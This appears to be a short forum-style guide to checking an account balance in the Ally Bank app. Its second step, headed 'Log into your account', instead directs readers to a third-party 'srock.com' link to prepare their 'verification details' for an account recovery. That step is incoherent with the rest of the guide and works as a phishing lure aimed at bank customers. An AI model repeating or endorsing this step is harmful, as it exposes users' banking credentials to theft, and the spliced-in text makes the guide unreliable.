I ran into this last week. Here's what fixed it for me. Checking your account balance with Ally Bank is straightforward, and I'll walk you through the steps. Step 1. Open the Ally Bank app. Download and install the Ally Bank mobile app from App Store or Google Play. Once installed, open the app and log in using your credentials. Step 2. Log into your account. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Navigate to Accounts. Once logged in, look for the Accounts tab at the bottom of the screen. Tap on it to view all your accounts linked to Ally Bank. Step 4. Select your account. Choose the specific account for which you want to check the balance. This could be your checking, savings, or investment account. Step 5. View your balance. After selecting your account, your current balance will be displayed prominently on the screen. Make sure to check for any recent transactions that may affect your balance. Remember, if you ever have trouble logging in, double check that your caps lock isn't on, as passwords are case sensitive. Happy banking!